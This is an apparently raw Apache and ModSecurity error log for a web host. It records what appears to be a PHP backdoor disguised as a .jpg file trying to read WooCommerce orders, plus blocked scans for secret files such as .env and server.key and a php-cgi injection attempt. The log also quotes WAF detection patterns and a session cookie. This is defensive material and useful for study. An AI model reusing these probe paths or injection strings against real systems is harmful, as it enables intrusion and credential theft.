Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms.dev-unit.com/nbpafebaef.jpg:7, referer: https://www.google.com [Sat Sep 20 16:49:36.233665 2025] [:error] [pid 13751:tid 13798] [client 207.154.240.68:46636] Stack trace:, referer: https://www.google.com [Sat Sep 20 16:49:36.233712 2025] [:error] [pid 13751:tid 13798] [client 207.154.240.68:46636] #0 /home/id/cms.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Sat Sep 20 16:49:36.233722 2025] [:error] [pid 13751:tid 13798] [client 207.154.240.68:46636] #1 {main}, referer: https://www.google.com [Sat Sep 20 16:49:36.233770 2025] [:error] [pid 13751:tid 13798] [client 207.154.240.68:46636] thrown in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 7, referer: https://www.google.com [Mon Sep 22 13:59:47.430246 2025] [:error] [pid 5828:tid 5844] [client 207.154.240.68:53314] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Mon Sep 22 13:59:47.430452 2025] [:error] [pid 5828:tid 5844] [client 207.154.240.68:53314] PHP Warning: include(/home/id/cms.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Mon Sep 22 13:59:47.430574 2025] [:error] [pid 5828:tid 5844] [client 207.154.240.68:53314] PHP Warning: include(): Failed opening '/home/id/cms.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Mon Sep 22 13:59:47.430663 2025] [:error] [pid 5828:tid 5844] [client 207.154.240.68:53314] PHP Fatal error: Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms.dev-unit.com/nbpafebaef.jpg:11, referer: https://www.google.com [Mon Sep 22 13:59:47.430675 2025] [:error] [pid 5828:tid 5844] [client 207.154.240.68:53314] Stack trace:, referer: https://www.google.com [Mon Sep 22 13:59:47.430719 2025] [:error] [pid 5828:tid 5844] [client 207.154.240.68:53314] #0 /home/id/cms.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Mon Sep 22 13:59:47.430729 2025] [:error] [pid 5828:tid 5844] [client 207.154.240.68:53314] #1 {main}, referer: https://www.google.com [Mon Sep 22 13:59:47.430777 2025] [:error] [pid 5828:tid 5844] [client 207.154.240.68:53314] thrown in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 11, referer: https://www.google.com [Wed Sep 24 09:46:52.360307 2025] [:error] [pid 23905:tid 23921] [client 61.222.202.149:40815] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Thu Sep 25 12:33:31.358392 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:35862] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Thu Sep 25 12:33:31.358632 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:35862] PHP Warning: require_once(/home/id/cms.dev-unit.com/config/config.inc.php): Failed to open stream: No such file or directory in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 3, referer: https://www.google.com [Thu Sep 25 12:33:31.358764 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:35862] PHP Fatal error: Uncaught Error: Failed opening required '/home/id/cms.dev-unit.com/config/config.inc.php' (include_path='.:') in /home/id/cms.dev-unit.com/nbpafebaef.jpg:3, referer: https://www.google.com [Thu Sep 25 12:33:31.358776 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:35862] Stack trace:, referer: https://www.google.com [Thu Sep 25 12:33:31.358822 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:35862] #0 /home/id/cms.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Thu Sep 25 12:33:31.358832 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:35862] #1 {main}, referer: https://www.google.com [Thu Sep 25 12:33:31.358880 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:35862] thrown in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 3, referer: https://www.google.com [Thu Sep 25 14:59:55.343838 2025] [:error] [pid 16577:tid 16591] [client 207.154.240.68:60432] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sun Sep 28 10:40:24.731103 2025] [:error] [pid 28447:tid 28496] [client 207.154.240.68:40644] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sun Sep 28 10:40:24.731291 2025] [:error] [pid 28447:tid 28496] [client 207.154.240.68:40644] PHP Warning: include(/home/id/cms.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sun Sep 28 10:40:24.731420 2025] [:error] [pid 28447:tid 28496] [client 207.154.240.68:40644] PHP Warning: include(): Failed opening '/home/id/cms.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sun Sep 28 10:40:24.731509 2025] [:error] [pid 28447:tid 28496] [client 207.154.240.68:40644] PHP Fatal error: Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms.dev-unit.com/nbpafebaef.jpg:11, referer: https://www.google.com [Sun Sep 28 10:40:24.731520 2025] [:error] [pid 28447:tid 28496] [client 207.154.240.68:40644] Stack trace:, referer: https://www.google.com [Sun Sep 28 10:40:24.731565 2025] [:error] [pid 28447:tid 28496] [client 207.154.240.68:40644] #0 /home/id/cms.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Sun Sep 28 10:40:24.731574 2025] [:error] [pid 28447:tid 28496] [client 207.154.240.68:40644] #1 {main}, referer: https://www.google.com [Sun Sep 28 10:40:24.731621 2025] [:error] [pid 28447:tid 28496] [client 207.154.240.68:40644] thrown in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 11, referer: https://www.google.com [Tue Sep 30 14:28:56.321381 2025] [:error] [pid 1076:tid 1088] [client 207.154.240.68:48694] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Tue Sep 30 14:28:56.321586 2025] [:error] [pid 1076:tid 1088] [client 207.154.240.68:48694] PHP Warning: include(/home/id/cms.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Tue Sep 30 14:28:56.321707 2025] [:error] [pid 1076:tid 1088] [client 207.154.240.68:48694] PHP Warning: include(): Failed opening '/home/id/cms.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Tue Sep 30 14:28:56.321797 2025] [:error] [pid 1076:tid 1088] [client 207.154.240.68:48694] PHP Fatal error: Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms.dev-unit.com/nbpafebaef.jpg:11, referer: https://www.google.com [Tue Sep 30 14:28:56.321812 2025] [:error] [pid 1076:tid 1088] [client 207.154.240.68:48694] Stack trace:, referer: https://www.google.com [Tue Sep 30 14:28:56.321858 2025] [:error] [pid 1076:tid 1088] [client 207.154.240.68:48694] #0 /home/id/cms.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Tue Sep 30 14:28:56.321868 2025] [:error] [pid 1076:tid 1088] [client 207.154.240.68:48694] #1 {main}, referer: https://www.google.com [Tue Sep 30 14:28:56.321915 2025] [:error] [pid 1076:tid 1088] [client 207.154.240.68:48694] thrown in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 11, referer: https://www.google.com [Wed Oct 01 00:55:03.485696 2025] [:error] [pid 870:tid 908] [client 188.166.108.93:57668] [client 188.166.108.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aNxRtz7zzybNgcMlJroMTQAAAAg"] [Wed Oct 01 00:55:03.829685 2025] [:error] [pid 870:tid 924] [client 142.93.143.8:46712] [client 142.93.143.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aNxRtz7zzybNgcMlJroMTwAAABg"] [Wed Oct 01 00:55:06.128498 2025] [authz_core:error] [pid 872:tid 948] [client 142.93.143.8:46806] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Wed Oct 01 00:55:06.337750 2025] [authz_core:error] [pid 1076:tid 1083] [client 188.166.108.93:57728] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Wed Oct 01 11:35:36.654167 2025] [:error] [pid 14303:tid 14374] [client 109.202.99.41:23207] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/backup.sql"] [unique_id "aNzn2F-FXvdDMTsmh3US3gAAAE8"] [Wed Oct 01 11:35:36.665934 2025] [:error] [pid 14307:tid 14369] [client 109.202.99.41:58373] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/server.key"] [unique_id "aNzn2Gy9CFH0W1YmlGI6cgAAAIE"] [Wed Oct 01 11:35:36.721029 2025] [:error] [pid 14547:tid 14567] [client 109.202.99.41:24817] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/database_backup.sql"] [unique_id "aNzn2Pjp_2kv0GgoTdZYhAAAANI"] [Wed Oct 01 11:35:36.727304 2025] [:error] [pid 14547:tid 14568] [client 109.202.99.41:13077] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/dump.sql"] [unique_id "aNzn2Pjp_2kv0GgoTdZYhgAAANM"] [Wed Oct 01 11:35:36.740792 2025] [:error] [pid 14303:tid 14378] [client 109.202.99.41:39617] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "aNzn2F-FXvdDMTsmh3US3wAAAFE"] [Wed Oct 01 11:35:36.758409 2025] [:error] [pid 14547:tid 14549] [client 109.202.99.41:39877] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/.svn/wc.db"] [unique_id "aNzn2Pjp_2kv0GgoTdZYjAAAAMA"] [Wed Oct 01 11:35:36.820460 2025] [:error] [pid 14307:tid 14387] [client 109.202.99.41:52029] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/etc/ssl/private/server.key"] [unique_id "aNzn2Gy9CFH0W1YmlGI6egAAAIo"] [Wed Oct 01 11:35:36.823851 2025] [:error] [pid 14297:tid 14330] [client 109.202.99.41:45793] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/database.sql"] [unique_id "aNzn2GVWilLYI35-oolTMAAAAAM"] [Wed Oct 01 11:35:36.829169 2025] [authz_host:error] [pid 14307:tid 14373] [client 109.202.99.41:2935] AH01753: access check of 'localhost' to /server-status failed, reason: unable to get the remote host name [Wed Oct 01 11:35:36.829212 2025] [authz_core:error] [pid 14307:tid 14373] [client 109.202.99.41:2935] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Wed Oct 01 11:35:36.868370 2025] [:error] [pid 14307:tid 14402] [client 109.202.99.41:31729] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/web.config"] [unique_id "aNzn2Gy9CFH0W1YmlGI6fQAAAJU"] [Wed Oct 01 13:28:06.625123 2025] [access_compat:error] [pid 14547:tid 14561] [client 54.169.226.40:35698] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/.env, referer: https://www.google.com/ [Wed Oct 01 13:28:06.780531 2025] [access_compat:error] [pid 14547:tid 14573] [client 54.169.226.40:35698] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/app/.env, referer: https://www.google.com/ [Wed Oct 01 13:28:06.935101 2025] [access_compat:error] [pid 14547:tid 14565] [client 54.169.226.40:35698] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/Datavase, referer: https://www.google.com/ [Wed Oct 01 17:03:39.414350 2025] [:error] [pid 14547:tid 14559] [client 207.154.240.68:49790] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Wed Oct 01 20:56:28.283301 2025] [access_compat:error] [pid 14547:tid 14571] [client 18.132.250.164:55690] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/.env, referer: https://www.google.com/ [Wed Oct 01 20:56:28.295671 2025] [access_compat:error] [pid 14547:tid 14570] [client 18.132.250.164:55690] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/app/.env, referer: https://www.google.com/ [Wed Oct 01 20:56:28.310183 2025] [access_compat:error] [pid 14547:tid 14557] [client 18.132.250.164:55690] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/Datavase, referer: https://www.google.com/ [Sat Oct 04 12:27:06.677919 2025] [:error] [pid 2353:tid 2473] [client 13.79.87.25:3598] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Sat Oct 04 12:27:09.777981 2025] [:error] [pid 2547:tid 2556] [client 13.79.87.25:7803] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun Oct 05 17:53:34.698530 2025] [:error] [pid 13211:tid 13232] [client 172.192.74.60:54013] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Thu Oct 09 14:25:54.042104 2025] [:error] [pid 4321:tid 4368] [client 207.154.240.68:51566] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Thu Oct 09 15:16:10.998191 2025] [:error] [pid 4321:tid 4356] [client 207.154.240.68:56010] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Thu Oct 09 20:35:28.680208 2025] [:error] [pid 21259:tid 21269] [client 207.154.240.68:54770] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Thu Oct 09 20:35:28.680455 2025] [:error] [pid 21259:tid 21269] [client 207.154.240.68:54770] PHP Warning: include(wp-config.php): Failed to open stream: No such file or directory in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 5, referer: https://www.google.com [Thu Oct 09 20:35:28.680559 2025] [:error] [pid 21259:tid 21269] [client 207.154.240.68:54770] PHP Warning: include(): Failed opening 'wp-config.php' for inclusion (include_path='.:') in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 5, referer: https://www.google.com [Thu Oct 09 20:35:28.680635 2025] [:error] [pid 21259:tid 21269] [client 207.154.240.68:54770] PHP Fatal error: Uncaught Error: Undefined constant "ABSPATH" in /home/id/cms.dev-unit.com/nbpafebaef.jpg:8, referer: https://www.google.com [Thu Oct 09 20:35:28.680647 2025] [:error] [pid 21259:tid 21269] [client 207.154.240.68:54770] Stack trace:, referer: https://www.google.com [Thu Oct 09 20:35:28.680690 2025] [:error] [pid 21259:tid 21269] [client 207.154.240.68:54770] #0 /home/id/cms.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Thu Oct 09 20:35:28.680700 2025] [:error] [pid 21259:tid 21269] [client 207.154.240.68:54770] #1 {main}, referer: https://www.google.com [Thu Oct 09 20:35:28.680749 2025] [:error] [pid 21259:tid 21269] [client 207.154.240.68:54770] thrown in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 8, referer: https://www.google.com [Wed Oct 15 00:08:20.159480 2025] [:error] [pid 12775:tid 12792] [client 172.190.142.176:28855] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/dropdown.php [Wed Oct 15 00:08:26.719803 2025] [:error] [pid 21080:tid 21084] [client 172.190.142.176:28110] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Oct 15 00:08:38.112984 2025] [:error] [pid 12775:tid 12779] [client 172.190.142.176:38496] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php [Wed Oct 15 00:22:31.804157 2025] [:error] [pid 10194:tid 10220] [client 20.242.104.10:1138] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Wed Oct 22 09:18:42.602576 2025] [:error] [pid 7574:tid 7642] [client 172.190.142.176:56094] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Thu Oct 23 01:34:13.579746 2025] [:error] [pid 21478:tid 21510] [client 48.210.8.193:5152] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun Oct 26 17:59:16.373225 2025] [:error] [pid 28886:tid 28893] [client 13.79.168.144:4220] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Wed Oct 29 06:46:23.897127 2025] [:error] [pid 25267:tid 25291] [client 52.169.148.186:1482] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/mariju.php [Wed Oct 29 06:46:24.378020 2025] [:error] [pid 25069:tid 25151] [client 52.169.148.186:1783] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Nov 04 00:38:06.442904 2025] [core:error] [pid 8067:tid 8078] [client 172.190.142.176:31133] Script timed out before returning headers: index.php [Fri Nov 07 13:56:26.409663 2025] [:error] [pid 31683:tid 31708] [client 172.190.142.176:32581] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/404.php [Mon Nov 10 18:17:04.164987 2025] [:error] [pid 7619:tid 7661] [client 209.38.71.77:56984] [client 209.38.71.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:_zendesk_session. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:_zendesk_session: XVwCw5DXj+ByX4jdq86g9euEPqv9tFdffFK1aPDuSdYHKqoqB8eyf3F+7us6mDOg6BaGRAVBO3sFZbH+anZMNuzkOAnSEHpvqpz0lM7j5178JDF8dyGn9a190pNYDSqYZUpaENU4qhmwjT7mnQq8XMbTn8fcVgKlmpCdsL0tv7zxxXXRFMNueqpWewGFRUX6S4+Ak8u2vE/+NQuigLOHavRNfK93EtKfWj95tr6mR1i0aCJtYhCKrw==--zrrqEQJuMg3Phvie--N+BNrSi5O5KQBw/14e19rA=="] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] 